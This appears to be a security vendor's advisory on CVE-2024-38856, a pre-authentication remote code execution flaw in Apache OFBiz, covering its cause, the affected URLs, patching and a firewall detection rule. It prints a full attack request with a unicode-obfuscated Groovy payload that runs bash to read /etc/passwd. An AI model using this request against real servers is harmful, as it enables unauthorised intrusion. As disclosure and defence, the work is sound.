The vulnerability is a pre-authentication RCE vulnerability in Apache OFBiz, which allows an attacker to execute malicious code without an authentication process by exploiting an incorrect authentication process when processing a request for a particular URL.
The vulnerability was patched in version 18.12.15 of Apache OFBiz, and AIWAF responds through the 2228: Apache OFBiz Remote Code Execution pattern added to the January 2025 pattern update and continues to monitor related vulnerabilities.
1. Overview
Apache OFBiz is a free and open source ERP, and we recently analyzed CVE-2024-38856, a pre-authentication RCE vulnerability discovered in the platform.
Source : https://www.helpnetsecurity.com/2024/08/05/cve-2024-38856/
2. Attack Type
CVE-2024-38856 is a pre-authentication RCE vulnerability in Apache OFBiz that allows requests to be processed without authentication due to an incorrect authentication process when processing requests for certain URLs.
There was previously a vulnerability, CVE-2024-36104, that utilized this process and was patched, but according to Sonicwall, the response was to add a check for Path Traversal without essentially fixing the feature, so it was possible to bypass that patch by sending a URL without the Path Traversal syntax.
Source : https://www.sonicwall.com/blog/sonicwall-discovers-second-critical-apache-ofbiz-zero-day-vulnerability
The attacker leverages the ProgramExport feature that renders page views to send a malicious payload in a groovyProgram parameter to a specific URL.
The following URLs are utilized in the attack
- /webtools/control/forgotPassword/ProgramExport
- /webtools/control/main/ProgramExport
- /webtools/control/showDateTime/ProgramExport
- /webtools/control/view/ProgramExport
- /webtools/control/TestService/ProgramExport
RCE Attack Request :
POST /webtools/control/main/ProgramExport HTTP/1.1
Content-Length: 1198
Content-Type: application/x-www-form-urlencoded
Host: www.tdst.com
User-Agent: HTTPie
groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u005b\u0022\u0062\u0061\u0073\u0068\u0022\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0022\u007b\u0065\u0063\u0068\u006f\u002c\u005a\u0057\u004e\u006f\u0062\u0079\u0042\u0062\u0063\u006d\u0056\u007a\u0064\u0057\u0078\u0030\u0058\u0054\u0073\u0067\u0059\u0032\u0046\u0030\u0049\u0043\u0039\u006c\u0064\u0047\u004d\u0076\u0063\u0047\u0046\u007a\u0063\u0033\u0064\u006b\u004f\u0079\u0042\u006c\u0059\u0032\u0068\u0076\u0049\u0046\u0074\u0079\u005a\u0058\u004e\u0031\u0062\u0048\u0052\u0064\u004f\u0077\u003d\u003d\u007d\u007c\u007b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u002d\u0064\u007d\u007c\u007b\u0062\u0061\u0073\u0068\u002c\u002d\u0069\u007d\u0022\u005d\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b
3. Response
Apache OFBiz has released a patch for CVE-2024-38856, and users of that product should patch to version 18.12.15 or later to respond. In our AIWAF product, the vulnerability is addressed via pattern 2228: Apache OFBiz Remote Code Execution, which was added in the January 2025 pattern update.
4. Conclusion
Apache OFBiz is a powerful open source ERP that is used in many organizations due to its open source nature, and this vulnerability has been identified as a highly impactful and dangerous vulnerability that has been added to the CISA category, with a CVSS score of 9.8, and should be patched to the latest version as soon as possible.
Our AIWAF product has developed a pattern of response to vulnerabilities in Apache OFBiz, and we will continue to respond quickly to related vulnerabilities as they are discovered.
